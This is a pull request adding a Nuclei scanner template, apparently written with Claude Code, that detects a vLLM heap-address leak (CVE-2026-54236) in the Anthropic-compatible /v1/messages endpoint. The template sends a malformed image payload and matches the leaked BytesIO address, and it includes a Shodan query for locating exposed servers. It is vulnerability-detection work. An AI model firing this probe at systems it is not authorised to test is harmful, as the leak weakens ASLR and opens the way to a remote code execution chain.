### PR TITLE
Add CVE-2026-54236 vLLM Anthropic router heap-address info-leak template

### DIFF
--- a/http/cves/2026/CVE-2026-54236.yaml
+++ b/http/cves/2026/CVE-2026-54236.yaml
@@ -1,0 +1,68 @@
+id: CVE-2026-54236
+
+info:
+  name: vLLM - Anthropic Router Heap-Address Information Leak
+  author: kenlacroix
+  severity: medium
+  description: |
+    vLLM <= 0.23.0 incompletely fixes CVE-2026-22778. The original fix added
+    sanitize_message to the OpenAI router, but the Anthropic-compatible router
+    (/v1/messages) and the speech-to-text endpoints echo str(exc) directly. A
+    malformed image therefore still leaks Pillow's BytesIO object repr
+    ("<_io.BytesIO object at 0x...>"), a live heap address, to an unauthenticated
+    client through those paths. The leak weakens ASLR and is the entry primitive
+    of the CVE-2026-22778 RCE chain.
+  impact: |
+    An unauthenticated attacker can leak heap addresses from the vLLM process,
+    defeating ASLR and enabling the CVE-2026-22778 heap-overflow RCE chain on
+    video-capable deployments.
+  remediation: |
+    Apply the upstream fix (vllm-project/vllm PR #45119) once released. Do not
+    expose the API to untrusted networks without authentication.
+  reference:
+    - https://github.com/advisories/GHSA-hgg8-fqqc-vfmw
+    - https://advisories.gitlab.com/pypi/vllm/CVE-2026-54236/
+    - https://github.com/vllm-project/vllm/pull/45119
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2026-54236
+    cwe-id: CWE-532
+  metadata:
+    max-request: 2
+    vendor: vllm
+    product: vllm
+    shodan-query: http.html:"vllm"
+  tags: cve,cve2026,vllm,llm,ai,info-leak,anthropic,intrusive
+
+http:
+  - raw:
+      - |
+        GET /v1/models HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json
+      - |
+        POST /v1/messages HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"model":"{{model}}","max_tokens":1,"messages":[{"role":"user","content":[{"type":"text","text":"{{rand_base(4)}}"},{"type":"image","source":{"type":"base64","media_type":"image/png","data":"bm90YW5pbWFnZQ=="}}]}]}
+
+    req-condition: true
+
+    extractors:
+      - type: regex
+        name: model
+        part: body_1
+        internal: true
+        group: 1
+        regex:
+          - '"id"\s*:\s*"([^"]+)"'
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        condition: and
+        dsl:
+          - 'status_code_2 == 500'
+          - 'contains(body_2, "_io.BytesIO object at 0x")'

--- a/http/cves/2026/CVE-2026-54236.yaml
+++ b/http/cves/2026/CVE-2026-54236.yaml
@@ -1,27 +1,17 @@
 id: CVE-2026-54236
 
 info:
-  name: vLLM - Anthropic Router Heap-Address Information Leak
+  name: vLLM <= 0.23.0 - Anthropic Router Heap Address Information Leak
   author: kenlacroix
   severity: medium
   description: |
-    vLLM <= 0.23.0 incompletely fixes CVE-2026-22778. The original fix added
-    sanitize_message to the OpenAI router, but the Anthropic-compatible router
-    (/v1/messages) and the speech-to-text endpoints echo str(exc) directly. A
-    malformed image therefore still leaks Pillow's BytesIO object repr
-    ("<_io.BytesIO object at 0x...>"), a live heap address, to an unauthenticated
-    client through those paths. The leak weakens ASLR and is the entry primitive
-    of the CVE-2026-22778 RCE chain.
+    vLLM <= 0.23.0 incompletely fixes CVE-2026-22778. The original fix added sanitize_message to the OpenAI router but the Anthropic-compatible router (/v1/messages) echoes str(exc) directly.
   impact: |
-    An unauthenticated attacker can leak heap addresses from the vLLM process,
-    defeating ASLR and enabling the CVE-2026-22778 heap-overflow RCE chain on
-    video-capable deployments.
+    Remote attackers can leak heap addresses, significantly reducing ASLR effectiveness and enabling further exploitation like remote code execution.
   remediation: |
-    Apply the upstream fix (vllm-project/vllm PR #45119) once released. Do not
-    expose the API to untrusted networks without authentication.
+    Update to vllm version to latest.
   reference:
     - https://github.com/advisories/GHSA-hgg8-fqqc-vfmw
-    - https://advisories.gitlab.com/pypi/vllm/CVE-2026-54236/
     - https://github.com/vllm-project/vllm/pull/45119
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
@@ -29,11 +19,14 @@ info:
     cve-id: CVE-2026-54236
     cwe-id: CWE-532
   metadata:
+    verified: true
     max-request: 2
     vendor: vllm
     product: vllm
-    shodan-query: http.html:"vllm"
-  tags: cve,cve2026,vllm,llm,ai,info-leak,anthropic,intrusive
+    shodan-query: http.html:"/v1/models" http.html:"vllm"
+    tags: cve,cve2026,vllm,llm,ai,info-leak,anthropic,intrusive
+
+flow: http(1) && http(2)
 
 http:
   - raw:
@@ -41,28 +34,35 @@ http:
         GET /v1/models HTTP/1.1
         Host: {{Hostname}}
         Accept: application/json
-      - |
-        POST /v1/messages HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
 
-        {"model":"{{model}}","max_tokens":1,"messages":[{"role":"user","content":[{"type":"text","text":"{{rand_base(4)}}"},{"type":"image","source":{"type":"base64","media_type":"image/png","data":"bm90YW5pbWFnZQ=="}}]}]}
-
-    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "\"id\":")'
+        condition: and
+        internal: true
 
     extractors:
       - type: regex
         name: model
-        part: body_1
+        part: body
         internal: true
         group: 1
         regex:
           - '"id"\s*:\s*"([^"]+)"'
 
-    matchers-condition: and
+  - raw:
+      - |
+        POST /v1/messages HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"model":"{{model}}","max_tokens":1,"messages":[{"role":"user","content":[{"type":"text","text":"{{randstr}}"},{"type":"image","source":{"type":"base64","media_type":"image/png","data":"bm90YW5pbWFnZQ=="}}]}]}
+
     matchers:
       - type: dsl
-        condition: and
         dsl:
-          - 'status_code_2 == 500'
-          - 'contains(body_2, "_io.BytesIO object at 0x")'
+          - 'status_code == 500'
+          - 'contains_all(body, "_io.BytesIO object at 0x", "internal_error")'
+        condition: and


### PR DESCRIPTION
Adds a template for **CVE-2026-54236** (GHSA-hgg8-fqqc-vfmw), the incomplete fix for CVE-2026-22778 in vLLM.

The CVE-2026-22778 fix sanitized the OpenAI router, but the Anthropic-compatible router (`/v1/messages`) and the speech-to-text endpoints echo `str(exc)` directly. A malformed image therefore still leaks Pillow's `BytesIO` heap address (`<_io.BytesIO object at 0x...>`) to an unauthenticated client. All versions up to `0.23.0` are affected (fix pending upstream).

The template:
1. `GET /v1/models` and extracts the served model id (internal extractor),
2. `POST /v1/messages` with a benign malformed base64 image (Anthropic content block),
3. matches a `500` whose body contains `_io.BytesIO object at 0x`.

It never reaches the overflow code path.

### Verification
- `nuclei -validate`: passes.
- Live vLLM `0.23.0` (latest release): **matches** — the Anthropic path leaks the heap address even though the OpenAI path is sanitized.

### References
- https://github.com/advisories/GHSA-hgg8-fqqc-vfmw
- https://advisories.gitlab.com/pypi/vllm/CVE-2026-54236/

🤖 Generated with [Claude Code](https://claude.com/claude-code)